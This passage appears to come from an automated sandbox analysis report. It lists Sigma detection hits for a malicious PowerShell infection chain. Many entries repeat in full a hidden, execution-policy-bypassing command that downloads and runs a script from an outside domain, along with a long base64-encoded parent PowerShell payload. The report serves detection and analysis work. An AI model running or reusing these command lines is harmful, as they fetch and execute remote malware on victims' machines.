AeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADA
        Sigma detected: PowerShell Web Download
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADA
        Sigma detected: Suspicious Execution of Powershell with Base64
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADAATwBSAE4AegBTAHMAWgA3AEEAagBCAFQAWgBJAGQAOABiAFEAOABCADUAUQA2AE8AcwBSAGwAZQA2AGQASABRAGsAWgBwAEwAeQBxAHIAcABpAHUATQBtAFgAUQBSAFcAWQBGAGwAOABFAG8AbABJAFcAUQB0ADUAcABnAE0AagA2AFkAdQBwAFIAYwBEADkAeAA2AFMATQBYADEAcwBaADMAVAA1AG4ARgA5AHoANgB1AEwAbABjAEoAOQBHAEUAaQBUAFoAOQBhAFQATAA4AGYANQBxAGIAWQBMAGcAagAyAFIAeQBuADkAaQBqAE4AdABuAHgAVAByAG0AcwBRAGMAcQBnADEAVgBaAGsAUABoAFYAaABkADUAdwBvAHIATgB2AG4AMgA1AGYAWABYAE8AYQBTAHcAMQBqAFcARwBBAGsAagBkADQATAB6AHcATwBuAGwAZABwAGoARABkADEASwBTAGgAWABkADcAbwBTAFkANwBOAFAAeAB5AFUATABzADcAZwBGADkAZQBxAGMAUwBPAG4AOQAyAGYAYwBmAEkAUQB5AEYAegBLAGUAdwBhAEgAcgB4AEkAUQBvAGYATwBEAGUATABiAFkAQwB0AHEATABpAHMAYQBGAE0AYwBRAHoAQwBsAHQAawBkAG0AMwBSADkATQBPAHAAbAAgAD0AIAAiAEMAbwBtAHAAcgBlACIAIAA
        Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADA
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADA
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADAATwBSAE4AegBTAHMAWgA3AEEAagBCAFQAWgBJAGQAOABiAFEAOABCADUAUQA2AE8AcwBSAGwAZQA2AGQASABRAGsAWgBwAEwAeQBxAHIAcABpAHUATQBtAFgAUQBSAFcAWQBGAGwAOABFAG8AbABJAFcAUQB0ADUAcABnAE0AagA2AFkAdQBwAFIAYwBEADkAeAA2AFMATQBYADEAcwBaADMAVAA1AG4ARgA5AHoANgB1AEwAbABjAEoAOQBHAEUAaQBUAFoAOQBhAFQATAA4AGYANQBxAGIAWQBMAGcAagAyAFIAeQBuADkAaQBqAE4AdABuAHgAVAByAG0AcwBRAGMAcQBnADEAVgBaAGsAUABoAFYAaABkADUAdwBvAHIATgB2AG4AMgA1AGYAWABYAE8AYQBTAHcAMQBqAFcARwBBAGsAagBkADQATAB6AHcATwBuAGwAZABwAGoARABkADEASwBTAGgAWABkADcAbwBTAFkANwBOAFAAeAB5AFUATABzADcAZwBGADkAZQBxAGMAUwBPAG4AOQAyAGYAYwBmAEkAUQB5AEYAegBLAGUAdwBhAEgAcgB4AEkAUQBvAGYATwBEAGUATABiAFkAQwB0AHEATABpAHMAYQBGAE0AYwBRAHoAQwBsAHQAawBkAG0AMwBSADkATQBPAHAAbAAgAD0AIAAiAEMAbwBtAHAAcgBlACIAIAA
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6164, ProcessName: svchost.exe

        Data Obfuscation

        barindex
        Sigma detected: Powershell Download and Execute IEX
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc 